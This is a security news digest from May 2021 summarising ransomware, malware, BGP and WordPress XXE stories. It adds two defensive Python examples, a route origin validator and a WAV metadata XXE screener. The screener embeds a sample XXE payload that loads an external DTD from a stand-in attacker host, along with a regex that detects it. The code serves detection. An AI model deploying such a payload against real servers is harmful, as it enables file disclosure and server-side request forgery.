OSN May 21, 2021

Fortify Security Team
May 21, 2021

Title: Colonial Pipeline Hit With Class Action Lawsuit Following Cyberattack, Shutdown

Date Published: May 21, 2021


Excerpt: “The lawsuit states: “As a result of the Defendant’s failure to properly secure the Colonial Pipeline’s critical infrastructure – leaving it subjected to potential ransomware attacks like the one that took place on May 7, 2021, there have been catastrophic effects for consumers and other end-users of gasoline up and down the east coast. The Defendant’s unlawfully deficient data security has injured millions.””

Title: Here’s How We Got Persistent Shell Access on a Boeing 747 – Pen Test Partners

Date Published: May 21, 2021


Excerpt: “The system was so ancient its management server ran on Windows NT4 SP3, a distant ancestor of today’s Windows Server builds. That age posed a problem for PTP’s testers when they tried running modern pentesting tools against it: NT4 predated everyday attack surfaces such as the Remote Desktop Protocol. Simply put, lots of modern tools and techniques didn’t work. Metasploit all but failed, giving no obvious reason for doing so. Even Backtrack, the predecessor to Kali Linux, didn’t work – triggering lots of scratching of heads at PTP HQ.”

Title: Microsoft Warns of Data Stealing Malware That Pretends to Be Ransomware

Date Published: May 21, 2021


Excerpt: “STRRAT first emerged in the threat landscape in June 2020, with German cybersecurity firm G Data observing the Windows malware (version 1.2) in phishing emails containing malicious Jar (or Java Archive) attachments. “The RAT has a focus on stealing credentials of browsers and email clients, and passwords via keylogging,” G Data malware analyst Karsten Hahn detailed. “It supports the following browsers and email clients: Firefox, Internet Explorer, Chrome, Foxmail, Outlook, Thunderbird”.”

Title: Comcast Now Blocks BGP Hijacking Attacks and Route Leaks With RPKI

Date Published: May 16, 2021


Excerpt: “This helps to ensure that packets get to their intended destinations intact and cannot be hijacked or leaked to other destinations, making the network – and Internet traffic more generally – more secure and resilient for all users. Given the size and technical diversity of our network, deploying RPKI represented a significant effort, yet we were able to implement the update without disrupting performance for our customers.”
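What an RPKI deployment like the one above does at the router is Route Origin Validation (RFC 6811): every received BGP announcement is compared against the Route Origin Authorizations (ROAs) that cover its prefix and marked Valid, Invalid or NotFound, and Invalid routes are dropped. The following Python is an added illustration, not Comcast's code or a real validator; the ROA set, the prefixes (RFC 5737/3849 documentation ranges) and the AS numbers (RFC 5398 documentation ASNs) are all constructed.

```python
"""Route Origin Validation (RFC 6811) against a constructed set of ROAs.

Added example: a ROA authorises one origin AS to announce a prefix and any
more-specifics up to maxLength. An announcement is Valid if a covering ROA
matches its origin AS and length, Invalid if covering ROAs exist but none
match, and NotFound if no ROA covers the prefix at all.
"""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class ROA:
    prefix: str      # prefix named in the ROA, e.g. "192.0.2.0/24"
    max_length: int  # longest more-specific the holder allows
    asn: int         # origin AS authorised for it (0 = nobody may originate)


# Constructed ROAs, standing in for what a relying-party cache hands the router.
ROAS = [
    ROA("192.0.2.0/24", 24, 64500),      # only the exact /24, only AS64500
    ROA("198.51.100.0/24", 26, 64501),   # AS64501 may announce down to /26
    ROA("203.0.113.0/24", 24, 0),        # AS0 ROA: no AS may originate this
]


def validate(prefix: str, origin_asn: int, roas=ROAS) -> str:
    """Return 'valid', 'invalid' or 'not-found' for one announcement."""
    announced = ipaddress.ip_network(prefix, strict=True)
    covering = []
    for roa in roas:
        roa_net = ipaddress.ip_network(roa.prefix, strict=True)
        # A ROA covers the route if its prefix contains the announced prefix,
        # regardless of origin AS or maxLength (RFC 6811, section 2).
        if roa_net.version == announced.version and announced.subnet_of(roa_net):
            covering.append(roa)
    if not covering:
        return "not-found"
    for roa in covering:
        # A covering ROA matches when the origin AS is the ROA's AS and the
        # announced length does not exceed maxLength. An AS0 ROA never
        # matches a real route because no BGP route has origin AS 0.
        if roa.asn == origin_asn and announced.prefixlen <= roa.max_length:
            return "valid"
    return "invalid"


# Constructed announcements: legitimate, origin hijack, too-specific,
# within maxLength, AS0-protected, and a prefix with no ROA.
ANNOUNCEMENTS = [
    ("192.0.2.0/24", 64500),
    ("192.0.2.0/24", 64666),
    ("198.51.100.0/27", 64501),
    ("198.51.100.64/26", 64501),
    ("203.0.113.0/24", 64502),
    ("2001:db8::/32", 64500),
]


def filter_announcements(announcements=ANNOUNCEMENTS, roas=ROAS):
    """Apply the usual policy: drop Invalid, accept Valid and NotFound."""
    accepted, dropped = [], []
    for prefix, asn in announcements:
        state = validate(prefix, asn, roas)
        (dropped if state == "invalid" else accepted).append((prefix, asn, state))
    return accepted, dropped


if __name__ == "__main__":
    ok, bad = filter_announcements()
    for row in ok:
        print("accept", *row)
    for row in bad:
        print("drop  ", *row)
```

Note that NotFound routes are accepted: only a fraction of the routing table is covered by ROAs, so dropping NotFound would blackhole legitimate traffic. Origin validation also only checks the origin AS; an attacker who forges the correct origin and prepends their own AS (a path hijack) still passes this check, which is why ROV is a first step rather than a complete defence.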

Title: Darkside Affiliates Claim Gang’s Bitcoins in Deposit on Hacker Forum

Date Published: May 21, 2021


Excerpt: “REvil ransomware last year deposited $1 million worth of Bitcoin to a different hacking forum to attract new recruits into the operation. This move showed that they trusted the forum administrator with the money and that there was plenty of money to be made. Last week, DarkSide closed shop and informed affiliates that the decision came after losing access to their public-facing servers and it was “due to the pressure from the US” after the attack on Colonial Pipeline.”

Title: Microsoft Simuland, an Open-Source Lab Environment to Simulate Attack Scenarios

Date Published: May 21, 2021


Excerpt: “Microsoft has released SimuLand, an open-source lab environment that allows users to reproduce the techniques used in real attack scenarios. The tool could be used to test and improve Microsoft solutions, including Microsoft 365 Defender, Azure Defender, and Azure Sentinel defenses against real attack scenarios.”

Title: Microsoft, Google Clouds Hijacked for Gobs of Phishing

Date Published: May 19, 2021


Excerpt: “The malicious message volume from these trusted cloud services exceeded that of any botnet in 2020, and the trusted reputation of these domains, including outlook.com and sharepoint.com, increases the difficulty of detection for defenders,” the report, issued Wednesday, explained. “This authenticity perception is essential, as email recently regained its status as the top vector for ransomware; and, threat actors increasingly leverage the supply chain and partner ecosystem to compromise accounts, steal credentials and siphon funds.”

Title: Dev-Sec Disconnect Undermines Secure Coding Efforts

Date Published: May 20, 2021


Excerpt: “Among the advice that Romeo has for security teams and companies intent on improving their application security programs: Tune the tools to reduce false positives, work together to determine the right amount of resources to dedicate to security needs, educate developers about security, and also educate security professionals about development.”

Title: This Ransomware-Spreading Malware Botnet Just Won’t Go Away

Date Published: May 21, 2021


Excerpt: “The botnet, known for using old-fashioned worms that spread via removable USB drives and instant messaging apps, began diversifying its infrastructure in recent years to become more resilient and to deliver more dangerous payloads, Microsoft said. The botnet’s geographic targeting for bot distribution and installation expanded, too, it said: “more recent activity shows a shift to a more global distribution.””

Title: WordPress XXE Vulnerability in Media Library – CVE-2021-29447

Date Published: May 21, 2021


Excerpt: “WordPress versions 5.7, 5.6.2, 5.6.1, 5.6, 5.0.11 are affected by an XML eXternal Entity vulnerability where an authenticated user with the ability to upload files in the Media Library can upload a malicious WAVE file that could lead to remote arbitrary file disclosure and server-side request forgery (SSRF).”
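The mechanism behind an XXE in an audio upload is that WAVE files can carry an XML document in their metadata, and a media library that feeds that XML to a DTD-resolving parser lets the uploader declare external entities. The Python below is an added illustration, not WordPress or getID3 code: it walks the RIFF chunk list of an uploaded file, extracts the XML chunk and refuses any document that declares a DOCTYPE or entity. It assumes the XML sits in a RIFF chunk tagged `iXML`, as Broadcast WAVE metadata does; the WAV bytes and the sample entity payload are constructed in memory.

```python
"""Screen a WAVE upload for XXE payloads in its embedded XML metadata.

Added example: parse the RIFF container, pull out the iXML chunk, normalise
its encoding, and reject it if it carries a DTD. Refusing DTDs outright is
the simplest hardening; the parser never gets to see an external entity.
"""
import re
import struct

# Constructed sample of the kind of XML an attacker embeds: a parameter
# entity fetched from a hypothetical attacker-controlled host.
XXE_PAYLOAD = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE r [<!ENTITY % sp SYSTEM "http://attacker.example/ev.dtd"> %sp;]>'
    b'<r>&data;</r>'
)
CLEAN_IXML = b'<?xml version="1.0"?><BWFXML><PROJECT>demo</PROJECT></BWFXML>'

DTD_MARKERS = re.compile(rb"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)


def riff_chunks(data: bytes):
    """Yield (chunk_id, payload) for each chunk of a RIFF/WAVE file."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    pos = 12
    while pos + 8 <= len(data):
        cid, size = struct.unpack("<4sI", data[pos:pos + 8])
        payload = data[pos + 8:pos + 8 + size]
        if len(payload) != size:
            raise ValueError(f"truncated chunk {cid!r}")
        yield cid, payload
        pos += 8 + size + (size & 1)  # chunks are word-aligned with a pad byte


def build_wav(extra_chunks) -> bytes:
    """Constructed minimal PCM WAVE: 'fmt ', a tiny 'data' chunk, plus extras."""
    fmt = struct.pack("<HHIIHH", 1, 1, 8000, 16000, 2, 16)  # PCM, mono, 8 kHz
    chunks = [(b"fmt ", fmt), (b"data", b"\x00\x00" * 4)] + list(extra_chunks)
    body = b"WAVE"
    for cid, payload in chunks:
        body += cid + struct.pack("<I", len(payload)) + payload
        if len(payload) & 1:
            body += b"\x00"
    return b"RIFF" + struct.pack("<I", len(body)) + body


def decode_xml_bytes(raw: bytes) -> bytes:
    """Re-encode UTF-16 XML as UTF-8 so a byte-level DTD check cannot be
    dodged by submitting the same document in a different encoding."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16").encode("utf-8")
    if raw[:2] in (b"<\x00", b"\x00<"):  # BOM-less UTF-16
        enc = "utf-16-le" if raw[:2] == b"<\x00" else "utf-16-be"
        return raw.decode(enc).encode("utf-8")
    return raw


def check_wav_metadata(data: bytes) -> dict:
    """Return {'iXML': 'xxe' | 'clean'} for each XML metadata chunk found."""
    verdicts = {}
    for cid, payload in riff_chunks(data):
        if cid != b"iXML":
            continue
        xml = decode_xml_bytes(payload)
        verdicts[cid.decode()] = "xxe" if DTD_MARKERS.search(xml) else "clean"
    return verdicts


def is_safe_upload(data: bytes) -> bool:
    """Accept the file only if no XML chunk declares a DTD or entity."""
    try:
        return "xxe" not in check_wav_metadata(data).values()
    except ValueError:
        return False  # malformed container: reject rather than guess


if __name__ == "__main__":
    for name, wav in (("clean", build_wav([(b"iXML", CLEAN_IXML)])),
                      ("evil", build_wav([(b"iXML", XXE_PAYLOAD)]))):
        print(name, check_wav_metadata(wav), "accept" if is_safe_upload(wav) else "reject")
```

Rejecting any DTD is stricter than needed for valid iXML, which does not use one, and it avoids relying on every downstream XML library being configured with entity resolution disabled. The encoding normalisation matters: a check that only looks for ASCII `<!DOCTYPE` misses the same payload encoded as UTF-16, which XML parsers accept.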
